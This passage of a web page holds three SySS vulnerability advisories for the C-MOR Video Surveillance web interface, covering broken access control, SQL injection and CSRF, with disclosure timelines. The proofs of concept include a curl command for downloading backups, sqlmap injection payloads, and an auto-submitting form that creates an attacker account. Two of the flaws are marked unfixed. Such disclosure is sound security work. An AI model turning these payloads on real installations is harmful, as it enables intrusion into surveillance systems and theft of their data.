advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-024<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401<br />Tested Version(s): 5.2401<br />Vulnerability Type: Improper Access Control (CWE-284)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-05<br />Solution Date: 2024-07-31<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45170<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper or missing access control, low-privileged users can<br />use administrative functions of the C-MOR web interface.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that different<br />functions are only available to administrative users.<br /><br />However, access to those functions is restricted via the web application<br />user interface and not checked on the server side.<br /><br />Thus, by sending corresponding HTTP requests to the web server of the<br />C-MOR web interface, low-privileged users can also use administrative<br />functionality, for instance downloading backup files or changing<br />configuration settings.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />In this example, a low-privileged user downloads backup files by<br />directly sending a corresponding HTTP POST request to the page<br />"download-bkf.pml".<br /><br />For this, the following HTML code can be used:<br /><br /><html><br /> <body><br /> <form action="https://<HOST>/download-bkf.pml" method="POST"><br /> <input type="text" name="bkf" value="" placeholder="Please <br />insert the file name." /><br><br /> <input type="submit" value="Download"><br /> </form><br /> </body><br /></html><br /><br /><br />This PoC attack can also be performed using the following curl command:<br /><br />curl -X POST -d '<FILENAME>' --user '<USERNAME:PASSWORD>' --ciphers <br />'DEFAULT:!DH' https://<HOST>/download-bkf.pml<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Install C-MOR Video Surveillance version 6.00PL1.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-024<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-023<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: SQL Injection (CWE-89)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45174<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper validation of user-supplied data, different<br />functionalities of the C-MOR web interface are vulnerable to SQL<br />injection attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that different<br />provided functionalities of the C-MOR web interface are vulnerable<br />to SQL injection attacks.<br /><br />These kinds of attacks allow an authenticated user to execute arbitrary<br />SQL commands in the context of the corresponding MySQL database.<br /><br />In the following pages, SQL injection vulnerabilities were found:<br /><br />* list-timelapse.plm (URL parameter: "cam")<br />* list-motion.plm (URL parameter "cam")<br />* show-movies.plm (URL parameter "cam")<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Using the software tool sqlmap[4], the SQL injection vulnerabilities<br />via the URL parameter "cam" could be easily exploited, as the following<br />output exemplarily illustrates:<br /><br />(...)<br />sqlmap resumed the following injection point(s) from stored session:<br />- ---<br />Parameter: cam (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or <br />GROUP BY clause (FLOOR)<br /> Payload: days=1100&cam=cam1 AND (SELECT 2483 FROM(SELECT <br />COUNT(*),CONCAT(0x717a707071,(SELECT <br />(ELT(2483=2483,1))),0x717a707871,FLOOR(RAND(0)*2))x FROM <br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: days=1100&cam=cam1 AND (SELECT 9790 FROM <br />(SELECT(SLEEP(5)))Yfcf)<br />- ---<br />[17:16:12] [INFO] the back-end DBMS is MySQL<br />[17:16:12] [INFO] fetching banner<br />[17:16:12] [INFO] resumed: '5.1.66-0+squeeze1'<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.0<br />banner: '5.1.66-0+squeeze1'<br />(...)<br /><br /><br />By exploiting the SQL injection vulnerabilities, the MySQL database<br />could be accessed and dumped as database user "cam".<br /><br />In version 6.00PL01, some SQL injection attack instances were fixed.<br />However, others could still be found, for example via the URL<br />parameter "c" on the page getpic.pml.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The described security vulnerability has not been fixed entirely in<br />the newly released software version 6.00PL01.<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-023<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-023.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br />[4] sqlmap GitHub repository<br /> https://github.com/sqlmapproject/sqlmap<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben, and Matthias Deeg.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-022<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: Cross-Site Request Forgery (CWE-352)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45172<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to missing protection mechanisms, the C-MOR web interface is<br />vulnerable to cross-site request forgery (CSRF) attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The C-MOR web interface does not offer any protection against CSRF<br />attacks. These kinds of attacks force end users respectively their web<br />browsers to perform unwanted actions in a web application context in<br />which they are currently authenticated.<br /><br />CSRF attacks specifically target state-changing requests, for example in<br />order to enable or disable a feature, and not data theft, as an attacker<br />usually has no possibility to see the response of the forged request.<br /><br />In general, CSRF attacks are conducted with the help of the victim, for<br />example by a user visiting an attacker-controlled URL sent by e-mail in<br />their web browser. Often, CSRF attacks make use of cross-site scripting<br />attacks, but this is not mandatory.<br /><br />CSRF attacks can also be performed against a web application if a victim<br />is only visiting an attacker-controlled web server. In this case, the<br />attacker-controlled web server is used to generate a specially crafted<br />HTTP request in the context of the user's web browser which is then sent<br />to the vulnerable target web application.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The following HTML file containing a web form generates a simple<br />crafted HTTP POST request that creates a new user:<br /><br /><html><br /> <body onload="document.forms[0].submit()"><br /> <form action="https://<HOST>/dosetpassword.pml" method="POST"><br /> <input type="hidden" name="user" value="attacker" /><br /> <input type="hidden" name="user_fullname" value="Attacker" /><br /> <input type="hidden" name="pw1" value="password" /><br /> <input type="hidden" name="pw2" value="password" /><br /> </form><br /> </body><br /></html><br /><br /><br />When an authenticated C-MOR user with administrative privileges<br />visits a web server hosting this HTML file, a new attacker-controlled<br />user is created.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-022<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-022.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter and Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>